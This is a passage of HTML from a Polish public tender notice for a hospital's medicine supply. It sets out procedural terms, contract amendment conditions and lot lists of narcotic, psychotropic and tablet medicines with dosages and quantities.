zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Strony dopuszczają dokonywanie zmian zawartej umowy na zasadach określonych w art. 144 ustawy Prawo zamówień publicznych.2.	Strony oprócz zmian wynikających z art. 144 ustawy Prawo zamówień publicznych dopuszczają zmiany w umowie również w zakresie:1)	zmiany danych stron (np. zmiana siedziby, adresu, nazwy), które wymagają dla swej skuteczności pisemnego powiadomienia drugiej Strony;2)	zmiany na nowy refundowany produkt leczniczy równoważny (zgodnie z definicją zawartą w ustawie z dnia 6 września 2001 r. Prawo farmaceutyczne) po cenie nie wyższej niż zaoferowana w ofercie oraz nie wyższej niż limit refundacyjny obowiązujący w dniu zamianyw przypadku braku oferowanego produktu leczniczego (zaprzestania produkcji, wycofania z obrotu, utraty refundacji leku). Wykonawca zobowiązany jest udowodnić w razie zaistnienia okoliczności stanowiących podstawę zmiany stosownymi dokumentami. Po przeprowadzeniu negocjacji i ustaleniu charakteru zmiany Strony zawrą pisemny aneks do umowy. W przypadku gdy w okresie jednego miesiąca od powzięcia wiadomości o braku oferowanego produktu leczniczego strony nie osiągną pisemnego porozumienia co do warunków dostarczania nowego, równoważnego produktu leczniczego umowa ulega rozwiązaniu w tej części z ostatnim dniem tego terminu;3) zmiany na nowy wyrób medyczny równoważny z poz.33 wymieniony w Załączniku do umowy po cenie nie wyższej niż zaoferowana w ofercie w przypadku braku oferowanego towaru (zaprzestania produkcji, wycofania z obrotu). Wykonawca zobowiązany jest udowodnić w razie zaistnienia okoliczności stanowiących podstawę zmiany stosownymi dokumentami. Po przeprowadzeniu negocjacji i ustaleniu charakteru zmiany Strony zawrą pisemny aneks do umowy. W przypadku gdy w okresie jednego miesiąca od powzięcia wiadomości o braku oferowanego towaru nie osiągną pisemnego porozumienia co do warunków dostarczania nowego, równoważnego towaru umowa ulega rozwiązaniu w tej części z ostatnim dniem tego terminu; *(Pakiet Nr 6)4)	tymczasowego dostarczania towaru w jednostkowych opakowaniach o innej ilości sztuk w opakowaniu niż określona w ofercie Wykonawcy w przypadku braku dostępności na rynku produktu leczniczego w zaoferowanej wielkości opakowania;5)	zmiany ceny towaru w przypadku obniżenia limitu finansowania lub ceny hurtowej brutto leku, określonych w obwieszczeniu refundacyjnym Ministra Zdrowia, po złożeniu ofert lub w trakcie trwania umowy; cena hurtowa brutto dla Zamawiającego musi zostać obniżona w tym samym stopniu i nie może przekraczać nowych wartości limitu finansowania ani ceny hurtowej brutto określonychw obwieszczeniu refundacyjnym Ministra Zdrowia. Podwyższenie limitu finansowania lub ceny hurtowej brutto leku, określonychw obwieszczeniu refundacyjnym Ministra Zdrowia, nie stanowi podstawy do zmiany ceny hurtowej brutto, po jakiej zamawiający nabywa lek. W przypadku usunięcia leku z obwieszczenia refundacyjnego Ministra Zdrowia w trakcie trwania umowy, zamawiający zastrzega sobie prawo do rozwiązania umowy ze skutkiem natychmiastowym, o ile podmiot uprawniony do obrotu hurtowego nie zaproponuje odpowiednika znajdującego się w obwieszczeniu refundacyjnym Ministra Zdrowia, którego cena hurtowa brutto nie będzie wyższa niż cena hurtowa brutto leku, którego dostawy są przedmiotem umowy oraz nie wyższa niż aktualny na dzień zmiany limit finansowania;6)	stałego, czasowego lub dotyczącego konkretnej ilości obniżenia cen jednostkowych towaru na podstawie rabatów (upustów, itp.) udzielonych przez Wykonawcę. W przypadku stałego obniżenia ceny strony zawrą pisemny aneks do umowy. W przypadku czasowego lub dotyczącego konkretnej ilości towaru obniżenia ceny zmiana taka nie będzie wymagać sporządzenia pisemnego aneksu do umowy pod warunkiem, że udzielenie rabatu przez Wykonawcę będzie uwidocznione na fakturze Wykonawcy przynajmniej poprzez zawarcie informacji o wysokości rabatu. Potwierdzeniem takiej zmiany (przyjęciem rabatu) ze strony Zamawiającego będzie w takim przypadku zapłata faktury. W przypadku gdy Wykonawca nie umieści na fakturze informacji o wysokości rabatu konieczne będzie zawarcie pisemnego aneksu do umowy;7)	wydłużenie okresu trwania umowy – w przypadku niewyczerpania całości asortymentu stanowiącego przedmiot umowy do czasu jego wyczerpania.9)	zmiany ceny brutto towaru w przypadku zmiany stawki podatku VAT. Zmiana taka obowiązywać będzie od daty wejścia w życie stosownych aktów prawnych. Zmiana ceny w przypadku określonym w zd. 1 wiąże Strony umowy z mocy prawa i nie wymaga dokonywania zmiany niniejszej umowy w formie aneksu;9)	zmiany terminu ważności dostarczanego towaru w uzasadnionych przypadkach.3.	Zmiana określona w ust. 2 pkt 7 wymaga formy pisemnego aneksu pod rygorem nieważności</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-23</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">jezyk polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>-Pakiet nr 1: Leki narkotyczne.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	Fentanyl roztwór do podawania s.c., i.v., zewnątrzoponowo, podpajęczynówkowo 0,1mg/2ml x 50 amp.	op.	60/2.	Fentanyl roztwór do podawania s.c., i.v., zewnątrzoponowo, podpajęczynówkowo 0,5mg/10ml x 50 amp.	op.	50/3.	"Fentanyl system transdermalny x 5 plastrów x 2,75 mg w plastrze, o szybkości uwalniania 25 µg/h "	op.	15/4.	"Fentanyl system transdermalny x 5 plastrów x 5,5 mg w plastrze, o szybkości uwalniania 50 µg/h "	op.	5/5.	"Fentanyl system transdermalny x 5 plastrów x 8,25 mg w plastrze, o szybkości uwalniania 75 µg/h "	op.	2/6.	Ketamine hydrochloride 200mg/20ml x 5 fiol.	op.	2/7.	Methadone hydrochloride syrop 100 mg/ 100 ml x 1 butletka.	op.	40/8.	Morphine sulphate roztwór do wstzykiwań i.v., s.c. i i.m. 20mg /1ml x 10amp.	op.	60/9.	Oxycodone hydrochloride roztwór do wstzykiwań i.v.i s.c. 10mg /1ml x 10amp.	op.	400<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33661200-3, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>-Pakiet nr 2: Leki psychotropowe.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	Buprenorphine system transdermalny x 5 plastrów x 20 mg w plastrze, o szybkości uwalniania 35 µg/h op.	15/2.	Buprenorphine system transdermalny x 5 plastrów x 30 mg w plastrze, o szybkości uwalniania 52,5 µg/h op.	10/3.	Buprenorphine system transdermalny x 5 plastrów x 40 mg w plastrze, o szybkości uwalniania 70 µg/h op.	2/4.	Codeine phosphate/Sulfogaiacol (15mg + 300 mg) x 10 tabl.	op.	100/5.	Doxepin 10 mg x 30 kaps.	op.	2/6.	Doxepin 25 mg x 30 kaps.	op.	2/7.	Hydroksyzyna 10mg x 60 tabl.powl.	op.	70/8.	Hydroksyzyna 25mg x 60 tabl.powl.	op.	70/9.	Mianseryna 10 mg x 30 tabl.powl.	op.	2/10.	Mianseryna 30 mg x 30 tabl.powl.	op.	2/11.	Midazolam 5 mg/ 1ml x 10 amp.	op.	80/12.	Midazolam 50 mg /10 ml x 5 amp.	op.	90/13.	Opipramol 50mg x 20 tabl.powl.	op.	30/14.	Perazinum 25 mg x 20 tabl.	op.	3/15.	Pregabalin 75 mg x 56 kaps.	op.	5/16.	Pregabalin 150 mg x 56 kaps	op.	5/17.	Promazyna 25 mg x 60 tabl.	op.	10/18.	Quetiapine 25 mg x 30 tabl	op.	10/19.	Quetiapine 100 mg x 60 tabl	op.	3/20.	Sertraline 50 mg x 28 tabl. / tabl.powl.	op.	10/21.	Sulpiryd 50 mg x 24 kaps./ tabl.	op.	3/22.	Tiapride 100 mg x 20 tabl.	op.	5/23.	Trazodon 75 mg x 30 tabl.o przedł.uwaln.	op.	20/24.	Venlafaxine 37,5mg x 28 kaps./ tabl.	op.	2/25.	Venlafaxine 75 mg x 28 kaps./tabl.	op.	2/26.	Venlafaxine 150 mg x 28 kaps./tabl.	op.	2/27.	Zolpidem 10 mg x 10 tabl.powl.	op.	70<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33660000-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 3<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>-Pakiet nr 3: Tabletki.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>/1.	Acidum folicum 0,4 mg x 30 tabl.	op.	4/2.	Acidum folicum 5 mg x 30 tabl.	op.	15/3.	Acidum lipoicum 600 mg x 30 tabl.powl.	op.	3/4.	Alendronic acid 70 mg x 4 tabl.	op.	2/5.	Alfacalcidol 0,25 mcg x 100 kaps.	op.	3/6.	Alfacalcidol 1 mcg x 100 kaps.	op.	2/7.	Allopurinol 300 mg x 100 tabl.	op.	5/8.	Allopurinolum 300 mg x 30 tabl.	op.	3/9.	Ambroxolum 30 mg x 20 tabl.	op.	100/10.	Benazepril hydrochloride 5 mg x 28 tabl.	op.	3/11.	Benazepril hydrochloride 10 mg x 28 tabl.	op.	3/12.	Bisacodylum 5 mg x 40 tabl.dojelit.	op.	3/13.	Bromhexinum 8 mg x 40 tabl.	op.	20/14.	Calcium carbonicum 1,0 g (400mg jonów wapnia) x 100 kaps.twar.	op.	50/15.	Colchicine 0,5 mg x 20 tabl./ tabl.powl. /tabl.draż.	op.	5/16.	Colecalciferolum 1000 j.m. x 30 tabl.	op.	150/17.	Dexamethasonum 1 mg x 20 tabl.	op.	100/18.	Digoxinum 100 µg x 30 tabl.	op.	5/19.	Digoxinum 250 µg x 30 tabl.	op.	5/20.	Drotaverini hydrochloridum 40 mg x 20 tabl.powl.	op.	30/21.	Etamsylatum 250 mg x 30 tabl.	op.	100/22.	Ethambutolum 250 mg x 250 kaps.	op.	1/23.	Ferrosi sulfas 105 mg Fe2+ x 30 tabl.o przedłuż.uwal.	op.	15/24.	Ferrosi sulfas/ Ascorbid acid (100 mg Fe2+/ 60mg) x 50 tabl.o przedłuż.uwal.	op.	10/25.	Finasteride 5 mg x 30 tabl.powl.	op.	20/26.	Furaginum 50 mg x 30 tabl.	op.	30/27.	Gliclazidum 60mg x 60 tabl.o zmod.uwal.	op.	5/28.	Hydrocortisonum 20 mg x 20 tabl.	op.	40/29.	Kalii chloridum 391 mg K+ x 60 tabl.powl.	op.	150/30.	Klarytromycyna 500 mg x 14 tabl.powl.	op.	30/31.	Lercanidipini hydrochloridum 10 mg x 60 tabl.powl.	op.	10/32.	Loperamid 2mg x 30 tabl.	op.	30/33.	Magnesium aspartas 600mg (40mg Mg2+) x 50 tabl.	op.	70/34.	Melatoninum 5 mg x 30 tabl.	op.	5/35.	Metamizol 500 mg x 20 tabl.	op.	40/36.	Metformin 500 mg x 60 tabl.	op.	15/37.	Metformin 850 mg x 60 tabl.	op.	20/38.	Metformin 1000 mg x 60 tabl.	op.	10/39.	Metformini hydrochloridum 500 mg x 30 tabl. o przedł. dział.	op.	5/40.	Metformini hydrochloridum 750 mg x 30 tabl. o przedł. dział.	op.	5/41.	Metformini hydrochloridum 1000 mg x 30 tabl. o przedł. dział.	op.	5/42.	Methotrexate 2,5 mg x 50 tabl.	op.	5/43.	Methylodopum 250 mg x 50 tabl.	op.	2/44.	Methylprednisolonum 4 mg x 30 tabl.	op.	20/45.	Methylprednisolonum 16 mg x 30 tabl.	op.	5/46.	Monoazotan izosorbidu 60mg x30 tabl.o przedłuż.uwal.	op.	5/47.	Montelukast sodium 10 mg x 28 tabl.powl.	op.	20/48.	Nitrendipinum 10 mg x 60 tabl.	op.	10/49.	Nitrendipinum 20 mg x 60 tabl.	op.	5/50.	Omeprazol 20mg x 28 kaps.	op.	150/51.	Ondansetron 8 mg x 10 tabl. / tabl.rozp.w j.ustnej	op.	10/52.	Pancreatyna 25 tys.j.m. x 50 kaps.	op.	80/53.	Paracetamolum 500 mg x 20 tabl. BLISTER	op.	400/54.	Perindoprilum 5 mg x 30 tabl.powl.	op.	10/55.	Perindoprilum 10 mg x 30 tabl.powl.	op.	3/56.	Phospholipidum essentiale 300 mg x 50 kaps.	op.	30/57.	Phytomenadione 10 mg x 30 tabl.	op.	10/58.	Prednisonum 5 mg x 100 tabl.	op.	5/59.	Prednisonum 10 mg x 20 tabl.	op.	100/60.	Prednisonum 20 mg x 20 tabl.	op.	100/61.	Propafenon 150mg x 60 tabl.powl.	op.	10/62.	Rifaximinum 200 mg x 28 tabl.powl.	op.	10/63.	Rivaroxaban 15 mg x 100 tabl.powl.	op.	5/64.	Rivaroxaban 20 mg x 100 tabl.powl.	op.	5/65.	Rosuvastatin 5 mg x 30 tabl.	op.	30/66.	Rosuvastatin 10 mg x 30 tabl.	op.	30/67.	Simwastatyna 20 mg x 28 tabl.powl.	op.	10/68.	Sirolimusum 1 mg x 30 tabl.	op.	1/69.	Sulfasalazinum 500 mg x 100 tabl.dojelitowych	op.	5/70.	Tamsulosin h/chloride 0,4 mg x 30 tabl./ kaps.o przedł.uwal.	op.	30/71.	Telmisartan 40 mg x 28 tabl.	op.	40/72.	Telmisartan 80 mg x 28 tabl.	op.	40/73.	Thiamazolum 5 mg x 50 tabl.powl.	op.	10/74.	Thiamazolum 10 mg x 50 